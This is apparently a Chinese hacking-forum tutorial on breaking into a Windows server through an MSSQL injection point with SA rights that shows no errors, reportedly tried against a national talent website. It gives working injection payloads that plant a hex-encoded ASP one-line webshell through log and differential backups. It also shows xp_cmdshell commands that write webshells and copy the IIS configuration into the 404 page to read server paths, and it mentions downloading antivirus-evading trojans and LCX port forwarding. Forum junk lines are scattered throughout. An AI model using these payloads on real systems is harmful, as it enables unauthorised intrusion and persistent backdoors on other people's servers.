sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
* u2 z3 O5 E9 y1 V
8 z# s" X* [9 ^  [
  C; ?, {9 X+ `* r! U+ y                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
' ]+ j5 J! X- B$ l, U1 |7 N
6 S/ S; T: v8 J" j, H6 W0 z4 {+ p6 N                                                                 
4 B: L$ Z+ \. B/ l" [1 j# @& y                                                                 
                                                                  论坛： http://www.90team.net/



友情检测国家人才网

# F" V6 W6 l9 T7 H- ]3 v0 U
3 u! x5 ~  c1 n/ [* r6 y内容：MSSQL注入SA权限不显错模式下的入侵
- \8 e! z2 F' u- ~
4 U5 q% l/ I/ ?: V2 P) n8 }
" {4 y0 P+ P  r: ^一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

5 s1 V  ~! g) m
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

思路：

首先：

5 t1 m2 O, r1 F- {% n* X/ o通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

% ^. \7 d2 c" Q, @- @1.日志备份获得Webshell
% j" M% f0 _  Q+ r9 C8 J2 s- I
( i9 r" V& |* ~! M) w1 ^2 k- _9 D2.数据库差异备份获得Webshell

1 }. A, w$ ~, ^5 f4.直接下载免杀远控木马。
4 ^' K1 n: W6 r
. y; e6 k0 `  Y) `/ S2 a5.直接下载LCX将服务器端口转发出来
7 }& J5 E# r# B: I- H) {
# k3 }" o. w, m* Y5 _( h; Q$ ^9 z7 ~+ l6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
  Q; ^3 S& z* p- f" g2 \

9 K( m  u# e6 ~' G( R
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
$ ]- g6 x- `6 P7 P- Y( S6 G; f
我直接演示后面一个方法
- ?5 v) R' v8 b! z( ^/ s- X
" Z, m0 p$ q+ x- C* p
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
$ C% a$ L9 {, ^



/ c6 k3 J3 d' f8 Y◆日志备份：


1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
) |" j. b$ V7 _! {3 B
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
& P* Q6 [8 P% E& w" Q& i/ @7 |  
3. 备份并获得文件，删除临时表
, m( I; o5 e9 N; y" ^;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
; X& X8 U1 u: y0 X

) U1 H) t' ~9 s5 _, [
◆数据库差异备份
9 w3 _6 [. N6 p; B
' C! P) {+ d# u& u. L; X1 S（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

% s# j" m+ i! z4 [/ W" Q* `上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码

- @0 ~1 v9 K  `/ N' C1 `
4 H' O& A8 ?% _2 H% B: P9 c/ Z（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

! }; p+ Z1 D% ?! @( q: c; a% I3. 备份数据库并清理临时文件
$ k; \4 ^6 r: L! Y( x
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
: `. n8 p3 X0 b& ?" z% H
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
/ ]* u) k1 V3 j1 [, d8 \

' z3 \! Y4 U+ n) w) q* l1 r  L: d
9 d7 i3 U, [. |4 b0 _用^转义字符来写ASP(一句话木马)文件的方法:   

; F* C- _* G3 ?7 Z6 J1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
+ g0 [" T# {* ]6 z1 V( R; G  A6 I
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径

' w4 e7 F1 K# V4 {0 \) X+ K6 q     
0 p8 O: f/ t  w6 f     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
- |+ i% N. o2 e3 F8 Q6 o
4 r6 N+ Z- Q' A  J2 [; C执行命令
     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
) Y8 O& q, b$ q% x: V) }6 n
. M, ]: r' r0 Z9 S* `7 i" t6 R( A% [
% N; ~3 C+ I6 h$ t5 c# n
& E. T4 N; G3 T

6 N& w* Z6 p9 D9 z, V& x, p9 D
1 f/ t/ N; w+ s7 h
2 L: u) R( n7 z, S" {/ C
# I& F9 y8 e5 P% |
% [- J, C4 e' e8 M" O8 q, t5 b, Y, K


3 v6 D( f# S" k# }5 U0 W' u/ L/ _& |; U
2 g- |% c* H' f9 C- O


2 f3 Y9 I, g6 n  k* m  t
0 x* [( v3 ^0 x7 @% h


4 ?" Q. r# Y/ i8 V: o) V


: e/ F* P# r. a/ G, M; {& ^4 H
% ^# X& x- T7 S0 D# @  M; r

, U4 q5 e* x) Y9 E- @. t* ~4 U
, Q1 p3 r: s2 V4 p
8 b" n/ ^0 x' z- I
! Y- x) o  J. B/ T% U




9 v5 c9 Z, Z1 L( [

9 J* I% _" Y( H: _. @' ?: |




9 d2 Y& @+ ]& f- Q" v9 @- {. Z
$ R4 @" M  ?& W7 y6 r9 R: h

6 F2 H! W7 F( j& y/ g9 D


; x. M) i% `" v4 U
1 q% K! ]& P. f5 l0 T; B! Y# r